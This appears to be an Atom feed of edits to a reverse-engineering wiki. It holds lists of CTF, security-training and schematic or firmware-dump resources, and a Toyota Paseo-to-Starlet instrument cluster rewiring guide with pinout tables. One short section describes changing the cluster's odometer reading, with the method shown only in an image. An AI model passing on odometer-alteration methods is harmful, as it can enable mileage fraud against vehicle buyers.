::[https://ost2.fyi/ OpenSecurityTraining2] - is a free, beta-stage online platform built on Open edX that offers in-depth cybersecurity and reverse-engineering courses like x86 assembly, kernel exploitation, and firmware analysis.&lt;br /&gt;
&lt;br /&gt;
====Security CTF====&lt;br /&gt;
Capture the Flag (CTF) in computer security is an exercise in which participants attempt to find text strings, called &amp;quot;flags&amp;quot;, which are secretly hidden in purposefully vulnerable programs or websites.&amp;lt;br&amp;gt;&lt;br /&gt;
Learn more about reverse engineering and cybersecurity start playing CTF's.&lt;br /&gt;
&lt;br /&gt;
::[https://jaimelightfoot.com/blog/so-you-want-to-ctf-a-beginners-guide/ CTF Beginners Guide] - is intended to be a guide for beginners who have just started playing CTFs (or for people who have never played, but would like to).&lt;br /&gt;
&lt;br /&gt;
::[https://ctflearn.com/ CTFlearn] - The most beginner-friendly way to get into hacking. Challenges Test your skills by hacking your way through hundreds of challenges.&lt;br /&gt;
&lt;br /&gt;
::[https://ctf101.org/ CTF101] - a site documenting the basics of playing Capture the Flags. This guide was written and maintained by the OSIRIS Lab at New York University.&lt;br /&gt;
&lt;br /&gt;
::[https://picoctf.org/ picoCTF] - is a free computer security education program with original content built on a capture-the-flag framework created by security and privacy experts.&lt;br /&gt;
&lt;br /&gt;
::[https://microcorruption.com/ MicroCorruption] - is a online, embedded debugger that starts from scratch and introduces the very foundations of memory corruption. Great practice for learning the basics of binary exploitation.&lt;br /&gt;
&lt;br /&gt;
::[https://echoctf.red/ echoctf.red] - A platform to develop, run and administer CTF competitions. The online echoCTF.RED platform user interfaces and codebase.&lt;br /&gt;
&lt;br /&gt;
::[https://pwnable.kr/ Wargames Pwnable.kr] - is a non-commercial wargame site which provides various pwn challenges regarding system exploitation, including reverse engineering, web exploitation, and cryptography.&lt;br /&gt;
&lt;br /&gt;
::[https://pwnable.tw/challenge/ Wargames Pwnable.tw] - is a wargame site for hackers to test and expand their binary exploiting skills. HOW-TO. Try to find out the vulnerabilities exists.&lt;br /&gt;
&lt;br /&gt;
::[https://ctfsites.github.io/ More CTF sites] - A curated list of more CTF sites on Github.&lt;br /&gt;
&lt;br /&gt;
====Embedded security Challenge (ESC)====&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2025 csaw_esc_2025] - CSAW 2025 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2024 csaw_esc_2024] - CSAW 2024 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2023 csaw_esc_2023] - CSAW 2023 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2022 csaw_esc_2022] - CSAW 2022 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2021 csaw_esc_2021] - CSAW 2021 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2019 csaw_esc_2019] - CSAW 2019 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
====800 MHz AMPS Documentation====&lt;br /&gt;
::[https://wiki.recessim.com/w/images/8/86/Cellular_Telephone_Bible_With_SIDs.txt The Cellular Telephone Bible by Mike Larsen (1997)] Unlock codes and programming procedures of early 800 MHz analog AMPS cellular phones. This document also contains the system IDs (SID) of the 800 MHz analog service providers.&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Toyota_Paseo_GT_1.5_odometer_Starlet_P9_mod&amp;diff=3283</id>
		<title>Toyota Paseo GT 1.5 odometer Starlet P9 mod</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Toyota_Paseo_GT_1.5_odometer_Starlet_P9_mod&amp;diff=3283"/>
		<updated>2026-02-11T19:27:23Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: add long exposure night time image for better visual representation.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Modification Overview =&lt;br /&gt;
Modding guide on how to make the '''Toyota Paseo 1.5 GT''' (5E-FE 1995-1999) odometer plug and play &amp;quot;oem-clean&amp;quot; for the '''Toyota P9''' (EP91 4E-FE 1996-1999).&amp;lt;br&amp;gt;&lt;br /&gt;
This mod has the focus on not messing with the car wiring by depinning and changing the OEM wiring, but by modifying the GT cluster.&amp;lt;br&amp;gt; After all while GT parts are relatively abundant, GT cars themselves are far less common on the road, making these odometers extremely cheap and readily available in the Japanese used-parts market. &lt;br /&gt;
&lt;br /&gt;
There are three connectors on the back of these odometer clusters the connectors are both the same type however the pinout is different.&lt;br /&gt;
Most left connector is named '''A''', the middle one '''C''' and the most right one '''B'''. So: '''A, C, B.'''&lt;br /&gt;
&lt;br /&gt;
[[File:Clusters.png|frameless|380×300px|thumb|left]]&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
&lt;br /&gt;
==  Toyota Starlet P9 Instrument Cluster Pinout ==&lt;br /&gt;
Cluster details: P30, with Tachometer by DENSO.&lt;br /&gt;
Part numbers: 83800-10060 and 157370-5241.&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Low battery warning light → diode&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || Low battery warning light&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Parking brake warning light&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 5 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || IG− (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || Low oil pressure warning light (oil pressure switch)&lt;br /&gt;
|-&lt;br /&gt;
| 9 || Connected || IG+ (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 11 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Connected || SRS airbag warning light&lt;br /&gt;
|-&lt;br /&gt;
| 13 || Connected || SRS airbag warning light&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Fog light indicator&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || High beam indicator&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || High beam indicator&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Connected || Left turn signal indicator&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Upper B (E terminal on Paseo) terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 6 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || Lower 4P terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || Connected || Right turn signal indicator&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Low fuel warning light&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || ABS warning light&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Check engine light&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || E terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || T terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 8 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 11 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Connected || F terminal – fuel gauge&lt;br /&gt;
|-&lt;br /&gt;
| 13 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 14 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 15 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 16 || NC || —&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==  Paseo GT 1.5 Instrument Cluster Pinout ==&lt;br /&gt;
Cluster details: L17, with Tachometer by JECO.&lt;br /&gt;
Part numbers: 83800-16080 and 82208-001.&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || IG+ (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || Low battery warning light → diode&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Low battery warning light&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Parking brake warning light&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || Parking brake warning light&lt;br /&gt;
|-&lt;br /&gt;
| 7 || Connected || Airbag warning light&lt;br /&gt;
|-&lt;br /&gt;
| 8 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || Connected || P (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 11 || Connected || Airbag warning light&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Connected || Open door warning light&lt;br /&gt;
|-&lt;br /&gt;
| 13 || Connected || Open door warning light&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || High beam indicator&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || Common ground for indicator lights (high beam, turn signals, fog light)&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Left turn signal indicator&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Connected || FU terminal – fuel gauge&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Fog light indicator&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || Lower 4P terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 7 || Connected || Upper E terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || Right turn signal indicator&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || Connected || Master warning light&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Low fuel warning light&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || TU terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || ABS warning light&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Connected || Check engine light (MIL)&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Low oil pressure warning light (oil pressure switch)&lt;br /&gt;
|-&lt;br /&gt;
| 6 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 7 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || TE terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 9 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 11 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 12 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 13 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 14 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 15 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 16 || NC || —&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Instrument Cluster Wiring Modification ==&lt;br /&gt;
These are the modifications needed to be made on the GT cluster.&lt;br /&gt;
Below you will see the tables of traces that will need to be cut first. After cutting them we will rewire them.&lt;br /&gt;
&lt;br /&gt;
=== Cutting Traces ===&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Cutting &lt;br /&gt;
|-&lt;br /&gt;
| 1 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 2 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 3 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 5 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 6 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 10 || CUT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Cutting &lt;br /&gt;
|-&lt;br /&gt;
| 1 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 2 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 3 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 4 || CUT (cut close at FU terminal, leave room to solder)&lt;br /&gt;
|-&lt;br /&gt;
| 5 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 6 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 7 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 8 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 10 || CUT &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Cutting &lt;br /&gt;
|-&lt;br /&gt;
| 2 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 3 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 4 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 5 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 7 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 8 || CUT&lt;br /&gt;
|-&lt;br /&gt;
| 9 || CUT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Rewiring Traces ===&lt;br /&gt;
Rewiring can be done with jumpers made from resistor leads with heat shrink tubing around them or solid core modwire.&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Rewire&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Must now connect to what '''PIN 2''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Must now connect to what '''PIN 3''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Must now connect to what '''PIN 5''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 5 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Must now connect to what '''PIN 10''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Must now connect to '''PIN 5''' on '''connector B (16pin)''' going to oil pressure indicator light&lt;br /&gt;
|-&lt;br /&gt;
| 9 || Must now connect to what '''PIN 1''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC / OPEN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Rewire&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Must now connect to what '''PIN 5''' went to (FU terminal of fuel gauge)&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Must now connect to what '''PIN 1''' went to (high beam indicator light)&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Must now connect to the top of the high beam indicator light, here we disconnected two traces.&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Must now connect to what '''PIN 3''' went to (left indicator light)&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Must now connect to what '''PIN 7''' went to (E/FE screw terminals)&lt;br /&gt;
|-&lt;br /&gt;
| 6 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Must now connect to what '''PIN 6''' went to (reed switch, purpose unknown) &lt;br /&gt;
|-&lt;br /&gt;
| 10 || Must now connect to what '''PIN 8''' went to (right indicator light)&lt;br /&gt;
|-&lt;br /&gt;
| Jumper || Place a jumper from FE terminal (fuel gauge) to cut trace were '''PIN 2''' went to (top lamp ground)&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;gallery widths=302 heights=182&amp;gt;&lt;br /&gt;
File:Cut_double_trace_high_beam.PNG|Important disconnect two high beam indicator light traces on the top. Just jump the rest of the trace accordingly.&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Rewire&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Must now connect to what '''PIN 3''' went to (now goes to ABS warning indicator light)&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Must now connect to what '''PIN 4''' went to (now goes to check engine light)&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Must now connect to what '''PIN 8''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 8 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Must now connect to '''PIN 4''' on '''connector C (10pin)''' going to FU fuel gauge terminal&lt;br /&gt;
|-&lt;br /&gt;
| 14 || Must now connect to what '''PIN 7''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 15 || Must now connect to what '''PIN 9''' went to&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery widths=302 heights=182&amp;gt;&lt;br /&gt;
File:Cluster mods.jpg|A picture of all the mods that have been applied.&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== ODO Correction ==&lt;br /&gt;
If you want to correct yours to avoid getting in trouble by road inspection service. You will have to change it back to your old ODO meter milage.&amp;lt;br&amp;gt;&lt;br /&gt;
Please do not abuse this trick.. I have set mine from around 110.000 to 300.000. Just so I don't get in trouble.&amp;lt;br&amp;gt;&lt;br /&gt;
In the image below you can see how I did it.&lt;br /&gt;
&amp;lt;gallery widths=302 heights=182&amp;gt;&lt;br /&gt;
File:Odo correction.jpg&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Notes on the Modification ==&lt;br /&gt;
Leave the four lamps open (remove bulb). Do this for: '''open door warning, SRS airbag warning, park warning lights''' in the bottom left corner under connector A. Also next to connector A you have a the indicator light and a '''triangle warning light'''. Leave the triangle warning light open too. All these light are unused and '''not connected''', connecting them might short something not reverse engineered.&lt;br /&gt;
They must all be left OPEN FLOATING ('''important''').&lt;br /&gt;
&lt;br /&gt;
= Night time backlight =&lt;br /&gt;
[[File:Night_cluster_long_exposure.png|frameless|380×300px|thumb|left]]&lt;br /&gt;
[[File:Nighttime running.png|frameless|380×300px|thumb|left]]&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=File:Night_cluster_long_exposure.png&amp;diff=3282</id>
		<title>File:Night cluster long exposure.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=File:Night_cluster_long_exposure.png&amp;diff=3282"/>
		<updated>2026-02-11T19:23:37Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: long exposure for better example&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary ==&lt;br /&gt;
long exposure for better example&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Literature&amp;diff=3271</id>
		<title>Literature</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Literature&amp;diff=3271"/>
		<updated>2026-02-10T19:11:10Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: +CSAW 2025 Embedded Security Challenge&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Books, Journals, Magazines, Datasheets and all other literature related to reverse engineering is welcome here. The book pictured is the bound edition of a portion of the PDF's available in the PoC||GTFO section.[[File:POCorGTFO.jpg|thumb|&amp;lt;nowiki&amp;gt;Bound edition of PoC||GTFO, Proof of Concept OR Get The Fuck Out.&amp;lt;/nowiki&amp;gt;]]&lt;br /&gt;
&lt;br /&gt;
===Books and Magazines===&lt;br /&gt;
::[[PoCorGTFO|PoC||GTFO]] - International Journal of Proof-of-Concept or Get The Fuck Out (Mirror)&lt;br /&gt;
&lt;br /&gt;
::[https://wiki.recessim.com/w/images/0/01/HackingTheXbox_Free.pdf Hacking the Xbox] - An Introduction to Reverse Engineering by Andrew &amp;quot;bunnie&amp;quot; Huang&lt;br /&gt;
&lt;br /&gt;
::[https://nostarch.com/hardwarehackerpaperback The Hardware Hacker] - Manufacturing and Open Hardware by Andrew &amp;quot;bunnie&amp;quot; Huang&lt;br /&gt;
&lt;br /&gt;
::[https://www.lehmanns.de/shop/mathematik-informatik/56052761-9781789619133-practical-hardware-pentesting Practical Hardware Pentesting] - A guide to attacking embedded systems and protecting them against the most common hardware attacks (ISBN 978-1-78961-913-3).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks Awesome-Cybersecurity-Handbooks] - Big collection of documents for cybersecurity &amp;amp; reverse engineering.&lt;br /&gt;
&lt;br /&gt;
===Datasheets, boardviews, schematics, manuals===&lt;br /&gt;
&lt;br /&gt;
====Generic (various fields)====&lt;br /&gt;
&lt;br /&gt;
'''The curralated list below provides a wide range of useful websites offering resources regarding repair of wide range of electronic devices.'''&lt;br /&gt;
&lt;br /&gt;
::[https://www.eserviceinfo.com/ e-service info] - Here you can find free datasheets, service manuals, schema, schematic diagrams and software downloads, service menu and mode information, code calculators for many brands of equipment. Search in all service docs that are OCR'd.&lt;br /&gt;
&lt;br /&gt;
::[https://www.docin.com/ DOCin] - Chinese datasheet and other documents website&lt;br /&gt;
&lt;br /&gt;
::[https://www.espec.ws/ espec.ws] [https://www.google.com/search?q=file%3Apdf%20site%3Ahttps%3A%2F%2Fmonitor.espec.ws%2Ffiles 1e100 Dork]- Russian site for people specializing in the repair and development of electronic equipment or who want to learn how to do it. Has a archive with datasheets and schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://www.badcaps.net/ Badcaps] - Badcaps Electronics Repair Forum &amp;amp; Schematic Search.&lt;br /&gt;
&lt;br /&gt;
::[https://www.eserviceinfo.com/browse.php eServiceInfo] - Service manuals, schematics, documentation, programs, electronics, hobby ....&lt;br /&gt;
&lt;br /&gt;
::[https://elektrotanya.com/keres Elektrotanya] - This site helps you to save the Earth from electronic waste! Schemetics, Service manuals, etc.&lt;br /&gt;
&lt;br /&gt;
::[https://servlib.com/ ServLib] - The largest library of service manuals and schematics for Sony, Panasonic, Sharp, JBL. Repair information for electronics technicians. [https://github.com/AriZoneVibes/ServLibScrapper/ Scraper for ServLib].&lt;br /&gt;
&lt;br /&gt;
::[https://www.freeservicemanuals.info FreeServiceManuals] - Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.&lt;br /&gt;
&lt;br /&gt;
::[http://www.nostatech.nl/ Nostatech] - Nostatech's Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alldatasheet.com/ Alldatasheets] - Chinese datasheet database.&lt;br /&gt;
&lt;br /&gt;
::[https://alltransistors.com/ All Transistors] - All Transistors Datasheet. Cross Reference Search. Transistor Database.&lt;br /&gt;
&lt;br /&gt;
::[https://remont-aud.net/ Remont-aud] - Russian website offering a collection of schematics, datasheets and firmware dumps.&lt;br /&gt;
&lt;br /&gt;
::[http://rom.by/ rom.by] - Russian website has verious rom dumps, datasheet and schematics&lt;br /&gt;
&lt;br /&gt;
::[https://whycan.com whycan.com] - A Chinese embedded ARM development community offering a collection of schematics, SDKs for different platforms, datasheets, and firmware dumps.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/ S-manuals.com] - Schematics, Service Manuals, ..&lt;br /&gt;
&lt;br /&gt;
::[https://www.schematicsunlimited.com/ schematicsunlimited.com] - Download FREE diagrams, schematics, service manuals, operating manuals and other useful information for a variety of products.&lt;br /&gt;
&lt;br /&gt;
====Portable computers, smartphones, videocards, printers, TVs====&lt;br /&gt;
&lt;br /&gt;
'''The curralated list below provides a wide range of useful websites offering resources regarding repair of mostly smartphones, printers and laptops / notebooks.'''&lt;br /&gt;
&lt;br /&gt;
::[https://vlab.su/ Vlab.su] - Russian virtual repair community. Virtual repair laboratory. Any problem can be solved together.&lt;br /&gt;
&lt;br /&gt;
::[https://www.macdat.net/ macdat.net] - is a hobbyist-run website offering a detailed database of vintage laptop specs and Macintosh repair resources, including capacitor guides and service schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://www.electronica-pt.com/ Electrónica PT] - Portuguese community for basic and advanced electronics, electronic repair support center.&lt;br /&gt;
&lt;br /&gt;
::[https://thetechstall.com/ The Tech Stall] - Download all the necessary tools for laptop and desktop motherboard diagnostics and fixes at no cost for free to reduce e-waste and spare the environment.&lt;br /&gt;
&lt;br /&gt;
::[https://www.cyberforum.ru/notebook-circuit/ Cyberforum] - A Russian forum for programmers and system administrators also offering some schematics and boardview for repair.&lt;br /&gt;
&lt;br /&gt;
::[https://zremcom.ru/scheme/scheme-laptops Zremcom] - A Russian website for repair, setup of servers, computers. Service manuals and diagrams for computers, laptops and power supplies.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alisaler.com/ AliSaler] - Website offering EC &amp;amp; Bios firmwares / bins, datasheets, boardviews, schematics, ic equivalent information, and programmer software for laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alifixit.com/ AliFixit] - We believe in reviving technology and minimizing electronic waste. As our field is computers and laptops, we are here trying to provide as much stuff as possible for free to make our contribution.&lt;br /&gt;
&lt;br /&gt;
::[https://www.indiafix.in/p/schematic-and-boardview-collection.html IndiaFix] - Free laptop schematic &amp;amp; boardviews downloads. Desktop bios dumps, and free repair tips.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apple-schematic.se/ Apple Schematic] - Free schematic and boardview (BRD) for Apple Macbooks and other Apple devices.&lt;br /&gt;
&lt;br /&gt;
::[https://novoselovvlad.ru/ Novoselovvlad.ru] - Blog of the workshop of Vladislav Novoselov (offers schematics, bios dumps, and various other helpful tools).&lt;br /&gt;
&lt;br /&gt;
::[http://printer1.blogspot.com/ printer1] - Collection of service manuals for printers and laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://www.tvservice.org/ TV Service] - is a Russian website offering datasheets and schematics for TV repair.&lt;br /&gt;
&lt;br /&gt;
::[https://www.smarttvmanuals.net/ Smart Tv Manuals &amp;amp; Circuit Board Diagrams] - is a website offering datasheets and schematics for Smart TV repair.&lt;br /&gt;
&lt;br /&gt;
::[https://www.informaticanapoli.it/manuali-di-servizio/ informaticanapoli] - Italian website that offers service manuals and schematics for various laptop brands.&lt;br /&gt;
&lt;br /&gt;
::[https://www.gadget-manual.com/nvidia-geforce/ Gadget-Manual] - Graphic card manuals boardviews and datasheets.&lt;br /&gt;
&lt;br /&gt;
::[https://sector.biz.ua/docs/schematic_diagrams_msi_motherboards/schematic_diagrams_msi_motherboards.phtml Sector] - Russian website offering schemetic diagrams, datasheets and boardviews (Asrock, Asus, ECS, Gigabyte, Acer, IBM/Lenovo).&lt;br /&gt;
&lt;br /&gt;
::[https://schematic-x.blogspot.com/ Schematic-x] - Free laptops &amp;amp; desktop schematic diagrams and BIOS downloads.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/notebook S-manuals.com] - Notebooks, Schematics, Service Manuals, ..&lt;br /&gt;
&lt;br /&gt;
=====Laptop or smartphone Boardview / Schematic / Firmware [Groups]=====&lt;br /&gt;
::[https://t.me/schematicslaptop schematicslaptop] - Laptop schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://t.me/biosarchive biosarchive] - The largest channel of archived bios (firmwares) of laptops.&lt;br /&gt;
&lt;br /&gt;
